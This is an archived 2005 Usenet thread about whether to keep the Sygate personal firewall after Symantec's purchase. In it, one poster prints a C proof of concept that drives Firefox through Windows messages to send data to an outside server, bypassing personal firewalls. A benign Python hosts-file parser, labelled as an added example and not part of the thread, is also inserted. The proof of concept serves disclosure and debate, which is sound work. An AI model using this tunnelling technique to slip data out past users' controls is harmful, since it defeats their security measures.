
Sygate ??

August 24, 2005 10:01:58 PM

Archived from groups: comp.security.firewalls (More info?)

Having just read that Sygate was purchased by Symantec, and I just
started using Sygate about a month ago, I'm wondering if I should be
looking for something else or continue to use Sygate.

Overall, I like Sygate but I'm still in the learning stages.

I realize no one can see the future, but are the upgraded versions
really that important. I mean Sygate is working now, but in six
months or a year would technology outpace it??
[Assuming no further upgrades are issued]

Many moons ago, I used Zonealarm but it seemed to get flaky after
awhile. Version 3 I think.
Was using Norton until it expired. Came with new Dell System.

Currently using:
XP Home
Sygate
AVGuard
Firefox
Agent
Both AOL & MSN messenger.

No other apps have access to net. If anything comes up and asks to
enter or leave computer I say no. So far nothing has barfed.

I've been reading this group and a virus group. Learned a lot, but
I'm no expert in computers. Just looking for any info about
situation.

Tom


Anonymous
August 25, 2005 3:39:54 AM

i am a sygate die hard as well. symantec will probably pull the plug on
the free version. but who knows?

you could go with new ZA. it's not bad and better rated than most similar
SFW's.

check this link for ratings and SFW options.

http://www.firewallleaktester.com/tests.htm

dg


TJ <DELETEthomasj1@arczip.com> wrote in
news:o0tpg1hhfvdrbqeuuusqr7rdtpaee75q0q@4ax.com:

>
> Having just read that Sygate was purchased by Symantec, and I just
> started using Sygate about a month ago, I'm wondering if I should be
> looking for something else or continue to use Sygate.
>
> Overall, I like Sygate but I'm still in the learning stages.
>
> I realize no one can see the future, but are the upgraded versions
> really that important. I mean Sygate is working now, but in six
> months or a year would technology outpace it??
> [Assuming no further upgrades are issued]
>
> Many moons ago, I used Zonealarm but it seemed to get flaky after
> awhile. Version 3 I think.
> Was using Norton until it expired. Came with new Dell System.
>
> Currently using:
> XP Home
> Sygate
> AVGuard
> Firefox
> Agent
> Both AOL & MSN messenger.
>
> No other apps have access to net. If anything comes up and asks to
> enter or leave computer I say no. So far nothing has barfed.
>
> I've been reading this group and a virus group. Learned a lot, but
> I'm no expert in computers. Just looking for any info about
> situation.
>
> Tom
>



--
I am Against-TCPA
http://www.againsttcpa.com/
Anonymous
August 25, 2005 8:15:05 AM

I'm sticking with Sygate the free version for the next few months. Can't
predict what I'll do after that.

Since you just started using it, remember to go to 'applications' and on each
permitted app click on 'advanced' and set 'act as server' to No unless you
specifically need it to serve. It's the one weakness of Sygate, a mistaken
default setting. No big. Nex
Anonymous
August 25, 2005 12:15:27 PM

TJ <DELETEthomasj1@arczip.com> wrote:
> No other apps have access to net. If anything comes up and asks to
> enter or leave computer I say no. So far nothing has barfed.

You're fooled by your "Personal Firewall". Just open Firefox, and
try out my proof of concept here:

http://www.dingens.org/breakout-mozilla-firefox.c

Your "Personal Firewall" will not even detect that. Just use the
Windows-Firewall, it's enough.

Yours,
VB.
--
"It cannot be that the frustrated people in Rome decide what happens in
German bedrooms".
Harald Schmidt on "World Youth Day"
Anonymous
August 25, 2005 12:15:28 PM

On 25 Aug 2005 08:15:27 +0200, Volker Birk <bumens@dingens.org> wrote:

>TJ <DELETEthomasj1@arczip.com> wrote:
>> No other apps have access to net. If anything comes up and asks to
>> enter or leave computer I say no. So far nothing has barfed.
>
>You're fooled by your "Personal Firewall". Just open Firefox, and
>try out my proof of concept here:
>
>http://www.dingens.org/breakout-mozilla-firefox.c
>
>Your "Personal Firewall" will not even detect that. Just use the
>Windows-Firewall, it's enough.
>
>Yours,
>VB.

What is it supposed to do? The download manager came up and asked to
open or save c from www.dingens.org.
The file contained *phoneHome = "http://www.dingens.org/breakout.html"
and other stuff.
--

Dave
Central Mass. USA

To email: Replace
mailinator.com with email.com
Anonymous
August 25, 2005 9:30:50 PM

In article <o0tpg1hhfvdrbqeuuusqr7rdtpaee75q0q@4ax.com>,
DELETEthomasj1@arczip.com says...
>
> Having just read that Sygate was purchased by Symantec, and I just
> started using Sygate about a month ago, I'm wondering if I should be
> looking for something else or continue to use Sygate.
>
> Overall, I like Sygate but I'm still in the learning stages.
>
> I realize no one can see the future, but are the upgraded versions
> really that important. I mean Sygate is working now, but in six
> months or a year would technology outpace it??
> [Assuming no further upgrades are issued]
>
> Many moons ago, I used Zonealarm but it seemed to get flaky after
> awhile. Version 3 I think.
> Was using Norton until it expired. Came with new Dell System.
>
> Currently using:
> XP Home
> Sygate
> AVGuard
> Firefox
> Agent
> Both AOL & MSN messenger.
>
> No other apps have access to net. If anything comes up and asks to
> enter or leave computer I say no. So far nothing has barfed.
>
> I've been reading this group and a virus group. Learned a lot, but
> I'm no expert in computers. Just looking for any info about
> situation.
>
> Tom
>
Hi Tom. Guess I am one of the diehards who will keep using Sygate
for as long as possible. It has served me well for 4-yrs and without
causing any problems. When I heard the bad news last week, I began
having the same concerns as you. I see it this way:
1) Our installed Sygate contains all of the basic firewall requirements.
i.e. control of applications, IPs, ports, and protocols. About the only
thing overlooked is local host control 127.0.0.1. Sygate was going to
fix that but I guess they won't get to it :-(.
2) One big concern is the probable loss of signature updates. You didn't
say if you have the free or pro version. Only the pro has Intruder
Detection System (IDS) and the intrusion signature updates. Compare them at:
http://smb.sygate.com/products/spf/comparison_spf.htm
I prowled around looking at the files in my Sygate pro and found
trojan.dat. Looks like that is where the downloaded signatures go.
It contains a listing of hundreds of trojan applications. If you
continue to use Sygate pro you might want to make a backup of
file trojan.dat. You could supplement the use of the retained
data with a good hosts file:
http://www.mvps.org/winhelp2002/hosts.txt
Good luck in making a choice.
Casey
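
A hosts file of the kind suggested above blocks a name by mapping it to a loopback or null address. The following is an added example, not part of the thread: it parses hosts-file syntax and shows that matching is by exact name only, so subdomains and direct-to-IP connections are not covered. The sample entries are constructed, and the function names are hypothetical.

```python
"""Added example: look up hostnames in a hosts-format blocklist."""

# Addresses that blocklist-style hosts files use to sink unwanted names.
SINK_ADDRESSES = {"127.0.0.1", "0.0.0.0", "::1"}

# Constructed sample in hosts-file syntax (not taken from any real list).
SAMPLE_HOSTS = """\
# constructed sample blocklist
127.0.0.1   localhost
127.0.0.1   ads.example.test  tracker.example.test   # two names, one line
0.0.0.0     Malware.Example.TEST
192.0.2.10  intranet.example.test
badline-without-address
"""


def parse_blocklist(text):
    """Return the set of hostnames mapped to a sink address."""
    blocked = set()
    for raw in text.splitlines():
        # Everything after '#' is a comment in hosts-file syntax.
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        fields = line.split()
        if len(fields) < 2:
            continue  # malformed entry: address without a name, or vice versa
        address, names = fields[0], fields[1:]
        if address not in SINK_ADDRESSES:
            continue  # an ordinary mapping, not a block entry
        for name in names:
            name = name.lower().rstrip(".")
            if name != "localhost":  # the standard loopback entry is not a block
                blocked.add(name)
    return blocked


def is_blocked(hostname, blocked):
    """Exact, case-insensitive match; hosts files have no wildcard support."""
    return hostname.lower().rstrip(".") in blocked


if __name__ == "__main__":
    entries = parse_blocklist(SAMPLE_HOSTS)
    for host in ("ADS.example.test", "sub.ads.example.test",
                 "intranet.example.test"):
        print(host, "blocked" if is_blocked(host, entries) else "not blocked")
```
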
August 25, 2005 9:41:45 PM

On Thu, 25 Aug 2005 04:15:05 +0000 (UTC), Alan Pollock
<nex@nopanix.com> wrote:

>I'm sticking with Sygate the free version for the next few months. Can't
>predict what I'll do after that.
>
>Since you just started using it, remember to go to 'applications' and on each
>permitted app click on 'advanced' and set 'act as server' to No unless you
>specifically need it to serve. It's the one weakness of Sygate, a mistaken
>default setting. No big. Nex

Ahaa! Thanks for tip!

Tom
August 25, 2005 9:47:59 PM

On 25 Aug 2005 08:15:27 +0200, Volker Birk <bumens@dingens.org> wrote:

>TJ <DELETEthomasj1@arczip.com> wrote:
>> No other apps have access to net. If anything comes up and asks to
>> enter or leave computer I say no. So far nothing has barfed.
>
>You're fooled by your "Personal Firewall". Just open Firefox, and
>try out my proof of concept here:
>
>http://www.dingens.org/breakout-mozilla-firefox.c
>
>Your "Personal Firewall" will not even detect that. Just use the
>Windows-Firewall, it's enough.
>
>Yours,
>VB.

Sorry, I ain't downloading anything from unknown source.
Trust MS firewall?? Don't think so.

Tom
August 25, 2005 10:14:30 PM

On Thu, 25 Aug 2005 17:30:50 GMT, Casey Klc <casey@notspecified.net>
wrote:

[snipped]
>
>Hi Tom. Guess I am one of the diehards who will keep using Sygate
>for as long as possible. It has served me well for 4-yrs and without
>causing any problems. When I heard the bad news last week, I began
>having the same concerns as you. I see it this way:
>1) Our installed Sygate contains all of the basic firewall requirements.
>i.e. control of applications, IPs, ports, and protocols. About the only
>thing overlooked is local host control 127.0.0.1. Sygate was going to
>fix that but I guess they won't get to it :-(.
>2) One big concern is the probable loss of signature updates. You didn't
>say if you have the free or pro version. Only the pro has Intruder
>Detection System (IDS) and the intrusion signature updates. Compare them at:
>http://smb.sygate.com/products/spf/comparison_spf.htm
>I prowled around looking at the files in my Sygate pro and found
>trojan.dat. Looks like that is where the downloaded signatures go.
>It contains a listing of hundreds of trojan applications. If you
>continue to use Sygate pro you might want to make a backup of
>file trojan.dat. You could supplement the use of the retained
>data with a good hosts file:
>http://www.mvps.org/winhelp2002/hosts.txt
>Good luck in making a choice.
>Casey

Hi Casey,

I'm using the free version.

I've d/led Kerio and still looking through manual.
I still have to see about a ZA manual.
These seem to be the most popular PFW's.
The problem I have [And other neophyte users no doubt] is translating
the manual to english.

Thanks for tips.

Tom
Anonymous
August 26, 2005 3:46:30 PM

Dave McAuliffe <DaveMcA@mailinator.com> wrote:
> >> No other apps have access to net. If anything comes up and asks to
> >> enter or leave computer I say no. So far nothing has barfed.
> >You're fooled by your "Personal Firewall". Just open Firefox, and
> >try out my proof of concept here:
> >http://www.dingens.org/breakout-mozilla-firefox.c
> >Your "Personal Firewall" will not even detect that. Just use the
> >Windows-Firewall, it's enough.
> What is it supposed to do? The download manager came up and asked to
> open or save c from www.dingens.org.
> The file contained *phoneHome = "http://www.dingens.org/breakout.html"
> and other stuff.

Yes, of course. This is a proof of concept (POC) code sample to show,
how easy it is to trick "Personal Firewalls". It's written in the
programming language "C", so this is the reason, why it's a .c file.

You can compile it to an executable and try it out with Microsoft's MSVC
or i.e. with MinGW.

It sends this information outside: "breakout.html". This is done by
using your webbrowser to send this information, because usually
"Personal Firewall" users allow their webbrowser to communicate -
or they cannot use the WWW any more.

Of course, you can send other things than "breakout.html", anything
else also works, and you can send elsewhere than to www.dingens.org,
because it's just my machine ;-)

I wrote this piece of code, because we had such discussions also in
de.comp.security.misc and de.comp.security.firewall, the German sister
groups.

Some people claimed, that "Personal Firewalls" are secure, and that
we just had no idea, how a real "Personal Firewall" works.

So I was hacking those few lines of code without ever having seen a "Personal
Firewall" before. Ansgar Wiechers made a test with the most common
"Personal Firewalls" (Kerio, Norman, Outpost, Sygate, Tiny, ZoneAlarm,
Symantec Norton), and they all failed already with such an easy trick.

You should notice: this is only the easiest trick I'm aware of. There
are many, many other possibilities, too, to tunnel.

So we have the proof, that a "Personal Firewall" only can control
these applications, which allow to be controlled. This means, they're
useless, because a packet filter you're getting with the Windows-Firewall
also for free.

Yours,
VB.
--
"It cannot be that the frustrated people in Rome decide what happens in
German bedrooms".
Harald Schmidt on "World Youth Day"
Anonymous
August 26, 2005 3:49:17 PM

TJ <DELETEthomasj1@arczip.com> wrote:
> >Your "Personal Firewall" will not even detect that. Just use the
> >Windows-Firewall, it's enough.
> Sorry, I ain't downloading anything from unknown source.

No problem, here is the content of this file:

#include <windows.h>
#include <string.h>  /* strlen */

const char *phoneHome = "http://www.dingens.org/breakout.html";

int __stdcall WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine,
                      int nCmdShow)
{
    /* find the browser's top-level window, then its child window */
    HWND browser = FindWindowEx(NULL, NULL, "MozillaWindowClass", NULL);
    HWND wnd = FindWindowEx(browser, NULL, "MozillaWindowClass", NULL);
    int i;

    SetForegroundWindow(wnd);

    /* character 9 is TAB */
    PostMessage(wnd, WM_CHAR, (WPARAM) 9, 0);

    /* post the URL one character at a time */
    for (i=0; i<strlen(phoneHome); i++)
        PostMessage(wnd, WM_CHAR, (WPARAM) phoneHome[i], NULL);

    PostMessage(wnd, WM_KEYDOWN, (WPARAM) VK_RETURN, NULL);

    return 0;
}

> Trust MS firewall?? Don't think so.

If you don't trust in Microsoft Software, then I think, you're not
using Windows.

The Windows-Firewall is a small and easy packet filter, which is
implemented feasible.

Yours,
VB.
--
"It cannot be that the frustrated people in Rome decide what happens in
German bedrooms".
Harald Schmidt on "World Youth Day"
August 26, 2005 8:55:24 PM

On 26 Aug 2005 11:49:17 +0200, Volker Birk <bumens@dingens.org> wrote:

>TJ <DELETEthomasj1@arczip.com> wrote:
>> >Your "Personal Firewall" will not even detect that. Just use the
>> >Windows-Firewall, it's enough.
>> Sorry, I ain't downloading anything from unknown source.
>
>No problem, here is the content of this file:
>
>#include <windows.h>
>
>const char *phoneHome = "http://www.dingens.org/breakout.html";
>
>int __stdcall WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine,
> int nCmdShow)
>{
> HWND browser = FindWindowEx(NULL, NULL, "MozillaWindowClass", NULL);
> HWND wnd = FindWindowEx(browser, NULL, "MozillaWindowClass", NULL);
> int i;
>
> SetForegroundWindow(wnd);
>
> PostMessage(wnd, WM_CHAR, (WPARAM) 9, 0);
>
> for (i=0; i<strlen(phoneHome); i++)
> PostMessage(wnd, WM_CHAR, (WPARAM) phoneHome[i], NULL);
>
> PostMessage(wnd, WM_KEYDOWN, (WPARAM) VK_RETURN, NULL);
>
> return 0;
>}
>
>> Trust MS firewall?? Don't think so.
>
>If you don't trust in Microsoft Software, then I think, you're not
>using Windows.
>
>The Windows-Firewall is a small and easy packet filter, which is
>implemented feasible.
>
>Yours,
>VB.


I read your reply to Dave and this one, but this is way,
waaaaaaaaaaaay over my head.

And yes, I use Windows. There is little choice in today's market.
But I try to avoid MS applications and/or addons.

Thanks for reply but like I said, I have no idea what to do with info.

Tom

To be young again, when the brain is a sponge, soaking up knowledge.
Instead of old, when brain is a sieve.
Anonymous
August 27, 2005 12:42:14 PM

TJ <DELETEthomasj1@arczip.com> wrote:
> Thanks for reply but like I said, I have no idea what to do with info.

OK, I have to explain:

If you're using Microsoft Windows, then you have to trust Microsoft.

Why?

Microsoft Windows is the operating system. The operating system contains
the program - the kernel - which has the job to control all other programs
on your system. If you're not trusting in this program (the Windows kernel),
then you cannot trust the complete system. It does not matter, if you add
some extra software or not for this point.

BTW: the Windows kernel is not too bad. Until a limit I'd trust it. And
Microsoft is not the "evil empire" or something, Bill does not run
around with a black mantle, and I guess, he hasn't such heavy
problems with his breathing ;-) There are much better arguments for
free software than "no Microsoft".

OK so far? Well, next...

Tunneling cannot be prohibited without losing connection. Why this is true,
I explained some postings ago. Please read them, thank you ;-)

All what to do to ignore the control of a "Personal Firewall" for
"outbound connections" is to use some tunneling. This was clear, before
I saw my very first "Personal Firewall" (I in fact never used one, but
in the meanwhile, I saw Ansgar Wiechers testing some, and what I saw,
was a terribly incompetent accumulation of software garbage, I was
scared - I did not realize before, how sad those products are).

So I reflected, what would just be the easiest way for me to implement
tunneling, with what I'd have fewest work ;-) I decided to use tunneling
through Windows messages and HTTP with the web-browser the user uses.
This had an extra advantage - the browser usually is an exception, and
is not castrated by the "Personal Firewall" on every box, I thought,
because otherwise there would be no way for the user left to use webpages.
So perhaps using the browser was easiest.

I wrote a proof of concept, a POC code - this is what you find on
http://www.dingens.org/breakout.c - and I wrote it for Internet Explorer,
because most of the people who came to de.comp.security.* (where I'm
reading/writing) and are using "Personal Firewalls", also are using
this browser.

Other people tried it out with their "Personal Firewalls", and it ignored
any "Personal Firewall", as expected.

Then the first thing I heard was "but this is only with Internet Explorer,
because this browser is so insecure". So I wrote a POC for a second
browser, too, Mozilla Firefox, to show that this is not a browser problem.
You can find this code on
http://www.dingens.org/breakout-mozilla-firefox.c

Meanwhile, Ansgar Wiechers has tested this and many other attacks against
many "Personal Firewalls", and none of them managed to prohibit
communication to the outside.

This is not surprising, if you know, that you cannot prohibit tunneling
at all, it's just technically impossible, it's even theoretically
impossible.

The result of this thinking is: you only can control software, which is
already running on your PC, which is of good nature and wants to be
controlled, or which is malware and very dumb and incompetent itself.

This does not sound like "secure" to me.

Yours,
VB.
--
"It cannot be that the frustrated people in Rome decide what happens in
German bedrooms".
Harald Schmidt on "World Youth Day"
Anonymous
August 28, 2005 2:27:40 PM

begin quotation
from Volker Birk <bumens@dingens.org>
in message <43100b46@news.uni-ulm.de>
posted at 2005-08-27T06:42
> TJ <DELETEthomasj1@arczip.com> wrote:
>> Thanks for reply but like I said, I have no idea what to do with
>> info.

> OK, I have to explain:

> If you're using Microsoft Windows, then you have to trust Microsoft.

> Why?

> Microsoft Windows is the operating system. The operating system
> contains the program - the kernel - which has the job to control all
> other programs on your system. If you're not trusting in this program
> (the Windows kernel), then you cannot trust the complete system. It
> does not matter, if you add some extra software or not for this point.

Agreed, though it should be noted Windows has much more than the kernel.
This is, in fact, the same argument that has to be made against
binary-only drivers in the Linux kernel.

> BTW: the Windows kernel is not too bad. Until a limit I'd trust it.
> And Microsoft is not the "evil empire" or something, Bill does not
> run around with a black mantle, and I guess, he hasn't such heavy
> problems with his breathing ;-) There are much better arguments for
> free software than "no Microsoft".

For the most part, I agree here. However, I personally feel that I
cannot trust Microsoft, having personally used five consecutive versions
of Windows, all of which did not perform as advertised in one form or
another. In addition, Microsoft's security track record is just plain
atrocious. Granted, for a while Red Hat wasn't doing a whole lot better,
and other GNU/Linux distributions have had rather large gaffes as well.
But the cold hard fact is, before Windows was Internet capable, there
was *the* Internet worm, as in one. Remember that.

Another problem, not necessarily Microsoft's fault but a large part of
it, has to do with the rest of the shrinkwrapped binary-only software
industry which they have more or less legitimized. Usually this means
getting new software means opening up your wallet and releasing anywhere
from $20 to $1,000 or more, or playing Russian roulette with
unauthorized copies. I have the desire to do neither, and at the same
time bring other players to the game which I may not trust any more than
Microsoft.

> The result of this thinking is: you only can control software, which
> is already running on your PC, which is of good nature and wants to be
> controlled, or which is malware and very dumb and incompetent itself.

And that which you can't control, you can always kill, right?

--
___ _ _____ |*|
/ __| |/ / _ \ |*| Shawn K. Quinn
\__ \ ' < (_) | |*| skquinn@speakeasy.net
|___/_|\_\__\_\ |*| Houston, TX, USA
Anonymous
August 28, 2005 11:32:24 PM

Shawn K. Quinn <skquinn@speakeasy.net> wrote:
> For the most part, I agree here. However, I personally feel that I
> cannot trust Microsoft, having personally used five consecutive versions
> of Windows, all of which did not perform as advertised in one form or
> another. In addition, Microsoft's security track record is just plain
> atrocious. Granted, for a while Red Hat wasn't doing a whole lot better,
> and other GNU/Linux distributions have had rather large gaffes as well.
> But the cold hard fact is, before Windows was Internet capable, there
> was *the* Internet worm, as in one. Remember that.

I know. I don't think, Microsoft Windows is a highly secure platform
or something. They're getting better with this SP2 stuff for Windows XP
now, but there is much work left to do. And Windows just is too complex
to become a highly secure system ever, I think.

But: if one doesn't trust into Microsoft, then she/he just shouldn't use
Windows. That was what I was trying to say.

> > The result of this thinking is: you only can control software, which
> > is already running on your PC, which is of good nature and wants to be
> > controlled, or which is malware and very dumb and incompetent itself.
> And that which you can't control, you can always kill, right?

Unfortunately, this is not true for every malware. You just can protect
your PC and keep your eyes open and your brain clear, so you will not
get malware running on your box.

Yours,
VB.
--
"It cannot be that the frustrated people in Rome decide what happens in
German bedrooms".
Harald Schmidt on "World Youth Day"